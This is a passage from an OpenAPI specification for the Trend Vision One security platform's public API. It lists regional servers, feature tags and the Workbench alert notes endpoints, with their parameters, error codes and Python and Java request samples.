{
  "info": {
    "description": "\n<style>\n.notice-permission {\n    background-color: #eeeeee;\n    border: 1px solid #cccccc;\n    padding: 8px 16px 0 16px;\n    font-size: 12px;\n}\n</style>\n\n\nTrend Vision One Public API\n\n## Important\nAvoid submitting sensitive information using query parameters.  \nSensitive information included in URLs can be logged or exposed in unwanted locations such as server logs, browser history, and email messages.  \nOur APIs use custom request headers (such as `TMV1-*`) in some methods to avoid exposing sensitive information.\n",
    "license": {
      "name": "Copyright © 2025 Trend Micro Incorporated. All rights reserved.",
      "url": "https://www.trendmicro.com"
    },
    "title": "Trend Vision One Public API",
    "version": "v3.0"
  },
  "openapi": "3.0.1",
  "servers": [
    {
      "url": "https://api.xdr.trendmicro.com",
      "description": "United States"
    },
    {
      "url": "https://api.eu.xdr.trendmicro.com",
      "description": "European Union"
    },
    {
      "url": "https://api.sg.xdr.trendmicro.com",
      "description": "Singapore"
    },
    {
      "url": "https://api.xdr.trendmicro.co.jp",
      "description": "Japan"
    },
    {
      "url": "https://api.au.xdr.trendmicro.com",
      "description": "Australia"
    },
    {
      "url": "https://api.in.xdr.trendmicro.com",
      "description": "India"
    },
    {
      "url": "https://api.mea.xdr.trendmicro.com",
      "description": "United Arab Emirates"
    }
  ],
  "security": [
    {
      "bearerAuth": []
    }
  ],
  "tags": [
    {
      "name": "Accounts (Foundation Services release)"
    },
    {
      "name": "Alibaba Cloud accounts"
    },
    {
      "name": "Amazon ECS Clusters"
    },
    {
      "name": "API Keys"
    },
    {
      "name": "Attack Surface Discovery"
    },
    {
      "name": "Attestors"
    },
    {
      "name": "Audit Logs"
    },
    {
      "name": "AWS accounts"
    },
    {
      "name": "Case"
    },
    {
      "name": "Common"
    },
    {
      "name": "Compliance Scans"
    },
    {
      "name": "Connectivity"
    },
    {
      "name": "Container"
    },
    {
      "name": "Custom Script"
    },
    {
      "name": "Cyber Risk Subindexes"
    },
    {
      "name": "Datalake Pipeline",
      "description": "<style>\n.backup-Inline-alert {\n  display: flex;\n  width: 741px;\n  padding: 0px 16px;\n  align-items: flex-start;\n  border: 1px solid var(--Blue-50, #578AEF);\n}\n.content {\n  display: flex;\n  padding: 10px 4px 10px 0px;\n  align-items: flex-start;\n  gap: 8px;\n  flex: 1 0 0;\n  color: var(--text-lt-primary, rgba(0, 0, 0, 0.92));\n  /* Regular / Body-1 */\n  font-family: \"Segoe UI\";\n  font-size: 14px;\n  font-style: normal;\n  font-weight: 400;\n  line-height: 20px;\n}\n.content span {\n  font-weight: 600;\n}\n.icon-container {\n  display: flex;\n  width: 16px;\n  padding: 2px 0px 22px 0px;\n  flex-direction: column;\n  align-items: center;\n  align-self: stretch;\n}\n.toast-icon {\n  display: flex;\n  width: 16px;\n  height: 16px;\n  justify-content: center;\n  align-items: center;\n  color: #1E5EDE;\n}\n</style>\n\n<div class=\"backup-Inline-alert\">\n  <div class=\"content\">\n    <div class=\"icon-container\">\n      <div class=\"toast-icon\">\n        <div class=\"tmicon tmicon-info\"></div>\n      </div>\n    </div>\n    <div><span>Important:</span> Using the Datalake Pipeline APIs to bind telemetry data types requires Trend Vision One credits. Contact your system administrator.</div>\n  </div>\n</div>\n"
    },
    {
      "name": "Detection Models"
    },
    {
      "name": "Device Risk Profile"
    },
    {
      "name": "Device Vulnerabilities"
    },
    {
      "name": "Domain Account"
    },
    {
      "name": "Email"
    },
    {
      "name": "Email Asset Inventory"
    },
    {
      "name": "Endpoint"
    },
    {
      "name": "Endpoint Security"
    },
    {
      "name": "Events"
    },
    {
      "name": "Exceptions"
    },
    {
      "name": "Execution Results"
    },
    {
      "name": "Google Cloud projects"
    },
    {
      "name": "Images"
    },
    {
      "name": "Intelligence Reports"
    },
    {
      "name": "Kubernetes Clusters"
    },
    {
      "name": "Kubernetes Clusters Groups"
    },
    {
      "name": "Observed Attack Techniques"
    },
    {
      "name": "Observed Attack Techniques Pipeline"
    },
    {
      "name": "Occurrences"
    },
    {
      "name": "osquery"
    },
    {
      "name": "Playbooks"
    },
    {
      "name": "Policies"
    },
    {
      "name": "Risk Factors"
    },
    {
      "name": "Roles (Foundation Services release)"
    },
    {
      "name": "Rules"
    },
    {
      "name": "Rulesets"
    },
    {
      "name": "Sandbox Analysis"
    },
    {
      "name": "Search",
      "description": "Note: To search Workbench and Observed Attack Techniques data, use the  [Workbench API](#tag/Workbench/paths/~1v3.0~1workbench~1alerts/get) and  [Observed Attack Techniques API](#tag/Observed-Attack-Techniques/paths/~1v3.0~1oat~1detections/get)  instead.\n"
    },
    {
      "name": "Security Posture"
    },
    {
      "name": "Statistics"
    },
    {
      "name": "Suspicious Objects"
    },
    {
      "name": "Suspicious Object Exception List"
    },
    {
      "name": "Suspicious Object List"
    },
    {
      "name": "Trend Threat Intelligence Feed"
    },
    {
      "name": "User Risk Profile"
    },
    {
      "name": "Vulnerabilities"
    },
    {
      "name": "Workbench"
    },
    {
      "name": "Workbench notes"
    },
    {
      "name": "YARA Rule"
    }
  ],
  "x-tagGroups": [
    {
      "name": "Accounts",
      "tags": [
        "Accounts (Foundation Services release)",
        "API Keys",
        "Roles (Foundation Services release)"
      ]
    },
    {
      "name": "Alerts and Events",
      "tags": [
        "Workbench",
        "Workbench notes",
        "Observed Attack Techniques",
        "Observed Attack Techniques Pipeline",
        "Datalake Pipeline",
        "Detection Models",
        "Exceptions"
      ]
    },
    {
      "name": "Cyber Risk Exposure Management",
      "tags": [
        "Attack Surface Discovery",
        "Cyber Risk Subindexes",
        "Device Risk Profile",
        "Device Vulnerabilities",
        "Security Posture",
        "User Risk Profile",
        "Risk Factors"
      ]
    },
    {
      "name": "Audit Logs",
      "tags": [
        "Audit Logs"
      ]
    },
    {
      "name": "Case Management",
      "tags": [
        "Case"
      ]
    },
    {
      "name": "Cloud Accounts",
      "tags": [
        "AWS accounts",
        "Alibaba Cloud accounts",
        "Google Cloud projects"
      ]
    },
    {
      "name": "Email Security",
      "tags": [
        "Email Asset Inventory"
      ]
    },
    {
      "name": "Endpoint Security Operations",
      "tags": [
        "Endpoint Security"
      ]
    },
    {
      "name": "Response Actions",
      "tags": [
        "Common",
        "Container",
        "Custom Script",
        "Domain Account",
        "Email",
        "Endpoint",
        "osquery",
        "Suspicious Objects",
        "YARA Rule"
      ]
    },
    {
      "name": "Container Security",
      "tags": [
        "Policies",
        "Rules",
        "Rulesets",
        "Images",
        "Occurrences",
        "Events",
        "Kubernetes Clusters",
        "Kubernetes Clusters Groups",
        "Amazon ECS Clusters",
        "Vulnerabilities",
        "Compliance Scans",
        "Attestors"
      ]
    },
    {
      "name": "Search",
      "tags": [
        "Search",
        "Statistics"
      ]
    },
    {
      "name": "Security Playbooks",
      "tags": [
        "Playbooks",
        "Execution Results"
      ]
    },
    {
      "name": "System health check",
      "tags": [
        "Connectivity"
      ]
    },
    {
      "name": "Threat Intelligence",
      "tags": [
        "Intelligence Reports",
        "Sandbox Analysis",
        "Suspicious Object Exception List",
        "Suspicious Object List",
        "Trend Threat Intelligence Feed"
      ]
    }
  ],
  "paths": {
    "/v3.0/workbench/alerts/{alertId}/notes": {
      "get": {
        "summary": "Get alert notes",
        "description": "Displays the notes of the specified Workbench alert in a paginated list\n\n<div class=\"notice-permission\">\n  <b>API key role permissions required:</b><br>\n    <b>Workbench</b><br>\n  <ul>\n    <li>View, filter, and search</li>\n  </ul>\n\n</div>\n",
        "tags": [
          "Workbench notes"
        ],
        "parameters": [
          {
            "name": "TMV1-Filter",
            "description": "Filter for retrieving a subset of Workbench alert notes. Supported fields and operators:\n\n* id - Numeric string that identifies a Workbench alert note\n* creatorMailAddress - Email address of the user that created a Workbench alert note\n* creatorName - User that created a Workbench alert note\n* lastUpdatedBy - Parameter that indicates the user who last modified a Workbench alert note\n* 'eq' - Abbreviation of the operator 'equal to'\n* 'and' - Operator 'and'\n* 'or' - Operator 'or'\n* 'not' - Operator 'not'\n* '( )' - Symbols for grouping operands with their correct operator.\n\nNote: Include this parameter in every request that generates paginated output.\n",
            "in": "header",
            "schema": {
              "type": "string",
              "maxLength": 5000
            },
            "example": "creatorName eq 'John Doe'"
          },
          {
            "name": "alertId",
            "description": "Unique alphanumeric string that identifies a Workbench alert.",
            "in": "path",
            "required": true,
            "schema": {
              "type": "string"
            },
            "example": "WB-14-20190709-00003"
          },
          {
            "name": "startDateTime",
            "description": "Timestamp in ISO 8601 format that indicates the start of the data retrieval time range.\n\nNote: startDateTime cannot be earlier than \"1970-01-01T00:00:00Z\".\n",
            "in": "query",
            "schema": {
              "type": "string",
              "format": "date-time",
              "default": "1970-01-01T00:00:00Z"
            },
            "example": "2020-06-15T10:00:00Z"
          },
          {
            "name": "endDateTime",
            "description": "Timestamp in ISO 8601 format that indicates the end of the data retrieval time range.\n\nNote: endDateTime cannot be earlier than startDateTime\n",
            "in": "query",
            "schema": {
              "type": "string",
              "format": "date-time",
              "default": "Current date time"
            },
            "example": "2020-06-15T12:00:00Z"
          },
          {
            "name": "dateTimeTarget",
            "description": "Parameter that allows you to filter the retrieved Workbench alert notes.",
            "in": "query",
            "schema": {
              "type": "string",
              "enum": [
                "createdDateTime",
                "lastUpdatedDateTime"
              ],
              "default": "createdDateTime"
            }
          },
          {
            "name": "orderBy",
            "description": "Parameter to be used for sorting records. Records are returned in descending order by default. To return records in ascending order, add a phrase \"asc\" after the parameter name.\nSub-sorts can be specified by a comma-separated list of property names.\nSortable fields are as follows:\n* id\n* creatorMailAddress\n* creatorName\n* lastUpdatedBy\n* createdDateTime\n* lastUpdatedDateTime\n\nNote: You can use multiple fields, separated by commas, to sort the retrieved Workbench alert notes.\n",
            "in": "query",
            "schema": {
              "type": "string",
              "default": "createdDateTime desc",
              "maxLength": 200
            },
            "example": "creatorName,lastUpdatedDateTime desc"
          },
          {
            "name": "top",
            "description": "Number of records displayed on a page.",
            "in": "query",
            "schema": {
              "type": "integer",
              "enum": [
                50,
                100,
                200
              ],
              "default": 50
            }
          }
        ],
        "responses": {
          "200": {
            "description": "Successful operation",
            "content": {
              "application/json": {
                "schema": {
                  "type": "object",
                  "required": [
                    "items"
                  ],
                  "properties": {
                    "items": {
                      "type": "array",
                      "items": {
                        "$ref": "#/components/schemas/awb-WorkbenchAlertNoteV3"
                      }
                    },
                    "nextLink": {
                      "type": "string",
                      "description": "Link to retrieve the next page of entries in paginated output",
                      "example": "https://api.xdr.trendmicro.com/v3.0/workbench/alerts/WB-14-20190709-00003/notes?skipToken=skipToken"
                    }
                  },
                  "example": {
                    "items": [
                      {
                        "id": 2,
                        "content": "test note 2",
                        "creatorMailAddress": "john_doe@xdr.com",
                        "creatorName": "John Doe",
                        "createdDateTime": "2020-11-12T10:30:13Z",
                        "lastUpdatedBy": null,
                        "lastUpdatedDateTime": null
                      },
                      {
                        "id": 1,
                        "content": "test note 1",
                        "creatorMailAddress": "john_doe@xdr.com",
                        "creatorName": "John Doe",
                        "createdDateTime": "2020-11-11T15:10:08Z",
                        "lastUpdatedBy": "John Doe",
                        "lastUpdatedDateTime": "2020-11-11T15:15:21Z"
                      }
                    ],
                    "nextLink": "https://api.xdr.trendmicro.com/v3.0/workbench/alerts/WB-14-20190709-00003/notes?skipToken=skipToken"
                  }
                }
              }
            }
          },
          "400": {
            "description": "Bad request",
            "content": {
              "application/json": {
                "schema": {
                  "properties": {
                    "error": {
                      "type": "object",
                      "description": "* 3090003 - Unable to process the request. Verify that the request is properly formatted and try again. (Error code: 3090003)\n",
                      "properties": {
                        "code": {
                          "type": "string",
                          "example": "BadRequest",
                          "enum": [
                            "BadRequest"
                          ]
                        },
                        "message": {
                          "type": "string",
                          "example": "Unable to process the request. Verify that the request is properly formatted and try again. (Error code: 3090003)"
                        },
                        "number": {
                          "type": "integer",
                          "example": 3090003,
                          "enum": [
                            3090003
                          ]
                        }
                      },
                      "required": [
                        "code",
                        "message"
                      ]
                    }
                  },
                  "required": [
                    "error"
                  ]
                }
              }
            }
          },
          "404": {
            "description": "Not found",
            "content": {
              "application/json": {
                "schema": {
                  "properties": {
                    "error": {
                      "type": "object",
                      "description": "* 3090007 - Unable to process the request. Verify that the specified workbench ID exists and that you have permission to access the alert and try again. (Error code: 3090007)\n* 3090015 - False Positive Removed. Trend Micro has identified the alert as a false positive and removed it from Workbench. Please ignore the alert and proceed to other alerts (Error code: 3090015)\n",
                      "properties": {
                        "code": {
                          "type": "string",
                          "example": "NotFound",
                          "enum": [
                            "NotFound"
                          ]
                        },
                        "message": {
                          "type": "string",
                          "example": "Unable to process the request. Verify that the specified workbench ID exists and that you have permission to access the alert and try again. (Error code: 3090007)"
                        },
                        "number": {
                          "type": "integer",
                          "example": 3090007,
                          "enum": [
                            3090007,
                            3090015
                          ]
                        }
                      },
                      "required": [
                        "code",
                        "message"
                      ]
                    }
                  },
                  "required": [
                    "error"
                  ]
                }
              }
            }
          },
          "500": {
            "description": "Internal server error",
            "content": {
              "application/json": {
                "schema": {
                  "required": [
                    "error"
                  ],
                  "properties": {
                    "error": {
                      "type": "object",
                      "description": "* 3090999: An internal error has occurred. Please try again later. If the issue persists, contact your support provider. (Error code: 3090999)\n",
                      "required": [
                        "code",
                        "message"
                      ],
                      "properties": {
                        "code": {
                          "type": "string",
                          "enum": [
                            "InternalServerError"
                          ],
                          "example": "InternalServerError"
                        },
                        "message": {
                          "type": "string",
                          "example": "An internal error has occurred. Please try again later. If the issue persists, contact your support provider. (Error code: 3090999)"
                        },
                        "number": {
                          "type": "integer",
                          "enum": [
                            3090999
                          ],
                          "example": 3090999
                        }
                      }
                    }
                  }
                }
              }
            }
          }
        },
        "x-code-samples": [
          {
            "lang": "Python",
            "source": "import requests\nimport json\n\nurl_base = 'https://api.xdr.trendmicro.com'\nurl_path = '/v3.0/workbench/alerts/{alertId}/notes'\nurl_path = url_path.format(**{'alertId': 'YOUR_ALERTID'})\ntoken = 'YOUR_TOKEN'\n\nquery_params = {\n    'startDateTime': 'YOUR_STARTDATETIME (string)',\n    'endDateTime': 'YOUR_ENDDATETIME (string)',\n    'dateTimeTarget': 'YOUR_DATETIMETARGET (string)',\n    'orderBy': 'YOUR_ORDERBY (string)',\n    'top': 'YOUR_TOP (integer)'\n}\nheaders = {\n    'Authorization': 'Bearer ' + token,\n    'TMV1-Filter': 'YOUR_FILTER (string)'\n}\n\nr = requests.get(url_base + url_path, params=query_params, headers=headers)\n\nprint(r.status_code)\nfor k, v in r.headers.items():\n    print(f'{k}: {v}')\nprint('')\nif 'application/json' in r.headers.get('Content-Type', '') and len(r.content):\n    print(json.dumps(r.json(), indent=4))\nelse:\n    print(r.text)"
          },
          {
            "lang": "Java",
            "source": "import java.io.IOException;\nimport com.fasterxml.jackson.databind.JsonNode;\nimport com.fasterxml.jackson.databind.ObjectMapper;\nimport org.apache.hc.client5.http.ClientProtocolException;\nimport org.apache.hc.client5.http.impl.classic.CloseableHttpClient;\nimport org.apache.hc.client5.http.impl.classic.HttpClients;\nimport org.apache.hc.core5.http.ClassicHttpRequest;\nimport org.apache.hc.core5.http.ContentType;\nimport org.apache.hc.core5.http.Header;\nimport org.apache.hc.core5.http.HttpEntity;\nimport org.apache.hc.core5.http.HttpHeaders;\nimport org.apache.hc.core5.http.io.entity.EntityUtils;\nimport org.apache.hc.core5.http.io.support.ClassicRequestBuilder;\n\npublic class ApiSample {\n\n    public static void main(String[] args) {\n        String urlBase = \"https://api.xdr.trendmicro.com\";\n        String urlPath = \"/v3.0/workbench/alerts/{alertId}/notes\";\n        urlPath = urlPath.replace(\"{alertId}\", \"YOUR_ALERTID\");\n        String token = \"YOUR_TOKEN\";\n\n        ClassicHttpRequest request = ClassicRequestBuilder.get(urlBase + urlPath)\n                .addParameter(\"startDateTime\", \"YOUR_STARTDATETIME (string)\")\n                .addParameter(\"endDateTime\", \"YOUR_ENDDATETIME (string)\")\n                .addParameter(\"dateTimeTarget\", \"YOUR_DATETIMETARGET (string)\")\n                .addParameter(\"orderBy\", \"YOUR_ORDERBY (string)\")\n                .addParameter(\"top\", \"YOUR_TOP (integer)\")\n                .addHeader(HttpHeaders.AUTHORIZATION, \"Bearer \" + token)\n                .addHeader(\"TMV1-Filter\", \"YOUR_FILTER (string)\")\n                .build();\n\n        try (CloseableHttpClient httpClient = HttpClients.custom().disableContentCompression().build()) {\n            httpClient.execute(request, response -> {\n                HttpEntity entity = response.getEntity();\n                String contentType = (entity == null) ? \"\" : entity.getContentType();\n                long contentLength = (entity == null) ? 0 : entity.getContentLength();\n                boolean isChunked = (entity == null) ? false : entity.isChunked();\n\n                System.out.println(response.getCode());\n                for (Header header: response.getHeaders()) {\n                    System.out.println(header.getName() + \": \" + header.getValue());\n                }\n                System.out.println();\n                if (0 < contentLength || isChunked) {\n                    if (contentType.contains(\"application/json\")) {\n                        ObjectMapper mapper = new ObjectMapper();\n                        JsonNode jsonResponse = mapper.readTree(EntityUtils.toString(entity, \"UTF-8\"));\n                        System.out.println(mapper.writerWithDefaultPrettyPrinter().writeValueAsString(jsonResponse));\n                    } else {\n                        System.out.println(EntityUtils.toString(entity, \"UTF-8\"));\n                    }\n                }\n                return null;\n            });\n        } catch (ClientProtocolException e) {\n            e.printStackTrace();\n        } catch (IOException e) {\n            e.printStackTrace();\n        }\n    }\n}\n"
          }
        ]
      },
      "post": {
        "summary": "Add alert note",
        "description": "Adds a note to the specified Workbench alert\n\n<div class=\"notice-permission\">\n  <b>API key role permissions required:</b><br>\n    <b>Workbench</b><br>\n  <ul>\n    <li>Modify alert details</li>\n  </ul>\n\n</div>\n",
        "tags": [
          "Workbench notes"
        ],
        "parameters": [
          {
            "name": "alertId",
            "description": "Unique alphanumeric string that identifies a Workbench alert.",
            "in": "path",
            "required": true,
            "schema": {
              "type": "string"
            },
            "example": "WB-14-20190709-00003"
          }
        ],
        "requestBody": {
          "required": true,
          "content": {
            "application/json": {
              "schema": {
                "type": "object",
                "required": [
                  "content"
                ],
                "properties": {
                  "content": {
                    "type": "string",
                    "description": "Unique alphanumeric string that identifies a Workbench alert.",
                    "example": "It is a note.",
                    "maxLength": 500000
                  }
                }
              }
            }
          }
        },
        "responses": {
          "201": {
            "description": "Resource created",
            "headers": {
              "Location": {
                "description": "URL of the created resource",
                "required": true,
                "schema": {
                  "type": "string",
                  "example": "http://api.xdr.trendmicro.com/v3/workbench/alerts/WB-14-20190709-00003/notes/1"
                }
              }
            }
          },
          "400": {
            "description": "Bad Request",
            "content": {
              "application/json": {
                "schema": {
                  "properties": {
                    "error": {
                      "type": "object",
                      "description": "* 3090003 - Unable to process the request. Verify that the request is properly formatted and try again. (Error code: 3090003)\n",
                      "properties": {
                        "code": {
                          "type": "string",
                          "example": "BadRequest",
                          "enum": [
                            "BadRequest"
                          ]
                        },
                        "message": {
                          "type": "string",
                          "example": "Unable to process the request. Verify that the request is properly formatted and try again. (Error code: 3090003)"
                        },
                        "number": {
                          "type": "integer",
                          "example": 3090003,
                          "enum": [
                            3090003
                          ]
                        }
                      },
                      "required": [
                        "code",
                        "message"
                      ]
                    }
                  },
                  "required": [
                    "error"
                  ]
                }
              }
            }
          },
          "404": {
            "description": "Not Found",
            "content": {
              "application/json": {
                "schema": {
                  "properties": {
                    "error": {
                      "type": "object",
                      "description": "* 3090007 - Unable to process the request. Verify that the specified workbench ID exists and that you have permission to access the alert and try again. (Error code: 3090007)\n* 3090015 - False Positive Removed. Trend Micro has identified the alert as a false positive and removed it from Workbench. Please ignore the alert and proceed to other alerts (Error code: 3090015)\n",
                      "properties": {
                        "code": {
                          "type": "string",
                          "example": "NotFound",
                          "enum": [
                            "NotFound"
                          ]
                        },
                        "message": {
                          "type": "string",
                          "example": "Unable to process the request. Verify that the specified workbench ID exists and that you have permission to access the alert and try again. (Error code: 3090007)"
                        },
                        "number": {
                          "type": "integer",
                          "example": 3090007,
                          "enum": [
                            3090007,
                            3090015
                          ]
                        }
                      },
                      "required": [
                        "code",
                        "message"
                      ]
                    }
                  },
                  "required": [
                    "error"
                  ]
                }
              }
            }
          },
          "500": {
            "description": "Internal Server Error",
            "content": {
              "application/json": {
                "schema": {
                  "required": [
                    "error"
                  ],
                  "properties": {
                    "error": {
                      "type": "object",
                      "description": "* 3090999: An internal error has occurred. Please try again later. If the issue persists, contact your support provider. (Error code: 3090999)\n",
                      "required": [
                        "code",
                        "message"
                      ],
                      "properties": {
                        "code": {
                          "type": "string",
                          "enum": [
                            "InternalServerError"
                          ],
                          "example": "InternalServerError"
                        },
                        "message": {
                          "type": "string",
                          "example": "An internal error has occurred. Please try again later. If the issue persists, contact your support provider. (Error code: 3090999)"
                        },
                        "number": {
                          "type": "integer",
                          "enum": [
                            3090999
                          ],
                          "example": 3090999
                        }
                      }
                    }
                  }
                }
              }
            }
          }
        },
        "x-code-samples": [
          {
            "lang": "Python",
            "source": "import requests\nimport json\n\nurl_base = 'https://api.xdr.trendmicro.com'\nurl_path = '/v3.0/workbench/alerts/{alertId}/notes'\nurl_path = url_path.format(**{'alertId': 'YOUR_ALERTID'})\ntoken = 'YOUR_TOKEN'\n\nquery_params = {}\nheaders = {\n    'Authorization': 'Bearer ' + token,\n    'Content-Type': 'application/json;charset=utf-8'\n}\nbody = {\n    'content': 'YOUR_CONTENT (string)'\n}\n\nr = requests.post(url_base + url_path, params=query_params, headers=headers, json=body)\n\nprint(r.status_code)\nfor k, v in r.headers.items():\n    print(f'{k}: {v}')\nprint('')\nif 'application/json' in r.headers.get('Content-Type', '') and len(r.content):\n    print(json.dumps(r.json(), indent=4))\nelse:\n    print(r.text)"
          },
          {
            "lang": "Java",
            "source": "import java.io.IOException;\nimport com.fasterxml.jackson.databind.JsonNode;\nimport com.fasterxml.jackson.databind.ObjectMapper;\nimport org.apache.hc.client5.http.ClientProtocolException;\nimport org.apache.hc.client5.http.impl.classic.CloseableHttpClient;\nimport org.apache.hc.client5.http.impl.classic.HttpClients;\nimport org.apache.hc.core5.http.ClassicHttpRequest;\nimport org.apache.hc.core5.http.ContentType;\nimport org.apache.hc.core5.http.Header;\nimport org.apache.hc.core5.http.HttpEntity;\nimport org.apache.hc.core5.http.HttpHeaders;\nimport org.apache.hc.core5.http.io.entity.EntityUtils;\nimport org.apache.hc.core5.http.io.support.ClassicRequestBuilder;\n\npublic class ApiSample {\n\n    public static void main(String[] args) {\n        String urlBase = \"https://api.xdr.trendmicro.com\";\n        String urlPath = \"/v3.0/workbench/alerts/{alertId}/notes\";\n        urlPath = urlPath.replace(\"{alertId}\", \"YOUR_ALERTID\");\n        String token = \"YOUR_TOKEN\";\n\n        String requestyBody = \n                \"{\" +\n                \"    \\\"content\\\": \\\"YOUR_CONTENT (string)\\\"\" +\n                \"}\";\n\n        ClassicHttpRequest request = ClassicRequestBuilder.post(urlBase + urlPath)\n                .addHeader(HttpHeaders.AUTHORIZATION, \"Bearer \" + token)\n                .addHeader(\"Content-Type\", \"application/json;charset=utf-8\")\n                .setEntity(requestyBody, ContentType.APPLICATION_JSON)\n                .build();\n\n        try (CloseableHttpClient httpClient = HttpClients.custom().disableContentCompression().build()) {\n            httpClient.execute(request, response -> {\n                HttpEntity entity = response.getEntity();\n                String contentType = (entity == null) ? \"\" : entity.getContentType();\n                long contentLength = (entity == null) ? 0 : entity.getContentLength();\n                boolean isChunked = (entity == null) ? false : entity.isChunked();\n\n                System.out.println(response.getCode());\n                for (Header header: response.getHeaders()) {\n                    System.out.println(header.getName() + \": \" + header.getValue());\n                }\n                System.out.println();\n                if (0 < contentLength || isChunked) {\n                    if (contentType.contains(\"application/json\")) {\n                        ObjectMapper mapper = new ObjectMapper();\n                        JsonNode jsonResponse = mapper.readTree(EntityUtils.toString(entity, \"UTF-8\"));\n                        System.out.println(mapper.writerWithDefaultPrettyPrinter().writeValueAsString(jsonResponse));\n                    } else {\n                        System.out.println(EntityUtils.toString(entity, \"UTF-8\"));\n                    }\n                }\n                return null;\n            });\n        } catch (ClientProtocolException e) {\n            e.printStackTrace();\n        } catch (IOException e) {\n            e.printStackTrace();\n        }\n    }\n}\n"
          }
        ]
      }
    },
    "/v3.0/workbench/alerts/{alertId}/notes/{id}": {
      "get": {
        "summary": "Get alert note",
        "description": "Displays the specified Workbench alert note\n\n<div class=\"notice-permission\">\n  <b>API key role permissions required:</b><br>\n    <b>Workbench</b><br>\n  <ul>\n    <li>View, filter, and search</li>\n  </ul>\n\n</div>\n",
        "tags": [
          "Workbench notes"
        ],
        "parameters": [
          {
            "name": "alertId",
            "description": "Unique alphanumeric string that identifies a Workbench alert.",
            "in": "path",
            "required": true,
            "schema": {
              "type": "string"
            },
            "example": "WB-14-20190709-00003"
          },
          {
            "name": "id",
            "description": "Numeric string that identifies a Workbench alert note.",
            "in": "path",
            "required": true,
            "schema": {
              "type": "integer"
            },
            "example": 1
          }
        ],
        "responses": {
          "200": {
            "description": "OK",
            "headers": {
              "ETag": {
                "description": "Unique alphanumeric string that identifies the version of a resource.",
                "schema": {
                  "type": "string",
                  "example": "\"33a64df551425fcc55e4d42a148795d9f25f89d4\""
                }
              }
            },
            "content": {
              "application/json": {
                "schema": {
                  "$ref": "#/components/schemas/awb-WorkbenchAlertNoteV3"
                }
              }
            }
          },
          "404": {
            "description": "Not Found",
            "content": {
              "application/json": {
                "schema": {
                  "properties": {
                    "error": {
                      "type": "object",
                      "description": "* 3090007 - Unable to process the request. Verify that the specified workbench ID exists and that you have permission to access the alert and try again. (Error code: 3090007)\n* 3090008 - Unable to process the request. Verify that the request parameters are valid and try again. (Error code: 3090008)\n* 3090015 - False Positive Removed. Trend Micro has identified the alert as a false positive and removed it from Workbench. Please ignore the alert and proceed to other alerts (Error code: 3090015)\n",
                      "properties": {
                        "code": {
                          "type": "string",
                          "example": "NotFound",
                          "enum": [
                            "NotFound"
                          ]
                        },
                        "message": {
                          "type": "string",
                          "example": "Unable to process the request. Verify that the specified workbench ID exists and that you have permission to access the alert and try again. (Error code: 3090007)"
                        },
                        "number": {
                          "type": "integer",
                          "example": 3090007,
                          "enum": [
                            3090007,
                            3090008,
                            3090015
                          ]
                        }
                      },
                      "required": [
                        "code",
                        "message"
                      ]
                    }
                  },
                  "required": [
                    "error"
                  ]
                }
              }
            }
          },
          "500": {
            "description": "Internal Server Error",
            "content": {
              "application/json": {
                "schema": {
                  "required": [
                    "error"
                  ],
                  "properties": {
                    "error": {
                      "type": "object",
                      "description": "* 3090999: An internal error has occurred. Please try again later. If the issue persists, contact your support provider. (Error code: 3090999)\n",
                      "required": [
                        "code",
                        "message"
                      ],
                      "properties": {
                        "code": {
                          "type": "string",
                          "enum": [
                            "InternalServerError"
                          ],
                          "example": "InternalServerError"
                        },
                        "message": {
                          "type": "string",
                          "example": "An internal error has occurred. Please try again later. If the issue persists, contact your support provider. (Error code: 3090999)"
                        },
                        "number": {
                          "type": "integer",
                          "enum": [
                            3090999
                          ],
                          "example": 3090999
                        }
                      }
                    }
                  }
                }
              }
            }
          }
        },
        "x-code-samples": [
          {
            "lang": "Python",
            "source": "import requests\nimport json\n\nurl_base = 'https://api.xdr.trendmicro.com'\nurl_path = '/v3.0/workbench/alerts/{alertId}/notes/{id}'\nurl_path = url_path.format(**{'alertId': 'YOUR_ALERTID', 'id': 'YOUR_ID'})\ntoken = 'YOUR_TOKEN'\n\nquery_params = {}\nheaders = {\n    'Authorization': 'Bearer ' + token\n}\n\nr = requests.get(url_base + url_path, params=query_params, headers=headers)\n\nprint(r.status_code)\nfor k, v in r.headers.items():\n    print(f'{k}: {v}')\nprint('')\nif 'application/json' in r.headers.get('Content-Type', '') and len(r.content):\n    print(json.dumps(r.json(), indent=4))\nelse:\n    print(r.text)"
          },
          {
            "lang": "Java",
            "source": "import java.io.IOException;\nimport com.fasterxml.jackson.databind.JsonNode;\nimport com.fasterxml.jackson.databind.ObjectMapper;\nimport org.apache.hc.client5.http.ClientProtocolException;\nimport org.apache.hc.client5.http.impl.classic.CloseableHttpClient;\nimport org.apache.hc.client5.http.impl.classic.HttpClients;\nimport org.apache.hc.core5.http.ClassicHttpRequest;\nimport org.apache.hc.core5.http.ContentType;\nimport org.apache.hc.core5.http.Header;\nimport org.apache.hc.core5.http.HttpEntity;\nimport org.apache.hc.core5.http.HttpHeaders;\nimport org.apache.hc.core5.http.io.entity.EntityUtils;\nimport org.apache.hc.core5.http.io.support.ClassicRequestBuilder;\n\npublic class ApiSample {\n\n    public static void main(String[] args) {\n        String urlBase = \"https://api.xdr.trendmicro.com\";\n        String urlPath = \"/v3.0/workbench/alerts/{alertId}/notes/{id}\";\n        urlPath = urlPath.replace(\"{alertId}\", \"YOUR_ALERTID\");\n        urlPath = urlPath.replace(\"{id}\", \"YOUR_ID\");\n        String token = \"YOUR_TOKEN\";\n\n        ClassicHttpRequest request = ClassicRequestBuilder.get(urlBase + urlPath)\n                .addHeader(HttpHeaders.AUTHORIZATION, \"Bearer \" + token)\n                .build();\n\n        try (CloseableHttpClient httpClient = HttpClients.custom().disableContentCompression().build()) {\n            httpClient.execute(request, response -> {\n                HttpEntity entity = response.getEntity();\n                String contentType = (entity == null) ? \"\" : entity.getContentType();\n                long contentLength = (entity == null) ? 0 : entity.getContentLength();\n                boolean isChunked = (entity == null) ? false : entity.isChunked();\n\n                System.out.println(response.getCode());\n                for (Header header: response.getHeaders()) {\n                    System.out.println(header.getName() + \": \" + header.getValue());\n                }\n                System.out.println();\n                if (0 < contentLength || isChunked) {\n                    if (contentType.contains(\"application/json\")) {\n                        ObjectMapper mapper = new ObjectMapper();\n                        JsonNode jsonResponse = mapper.readTree(EntityUtils.toString(entity, \"UTF-8\"));\n                        System.out.println(mapper.writerWithDefaultPrettyPrinter().writeValueAsString(jsonResponse));\n                    } else {\n                        System.out.println(EntityUtils.toString(entity, \"UTF-8\"));\n                    }\n                }\n                return null;\n            });\n        } catch (ClientProtocolException e) {\n            e.printStackTrace();\n        } catch (IOException e) 